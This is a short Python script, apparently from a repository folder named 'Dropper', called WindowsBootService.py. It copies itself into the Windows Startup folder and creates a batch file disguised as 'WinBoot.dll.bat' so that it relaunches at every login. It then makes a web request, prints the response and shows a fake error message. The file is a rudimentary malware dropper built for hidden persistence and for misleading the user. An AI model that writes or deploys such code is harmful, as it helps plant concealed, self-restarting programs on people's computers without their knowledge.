Dropper/WindowsBootService.py

14 lines
470 B
Python

import os
import time
import requests
os.system("copy WindowsBootService.py %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup")
os.system("echo py WindowsBootService.py > %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinBoot.dll.bat")
x = requests.get('https://yandex.ru')
time.sleep(1)
print(x.text)
time.sleep(9)
print(x.text)
time.sleep(10)
print(x.text)
print("Something was fucked. Please try again")
exit(1)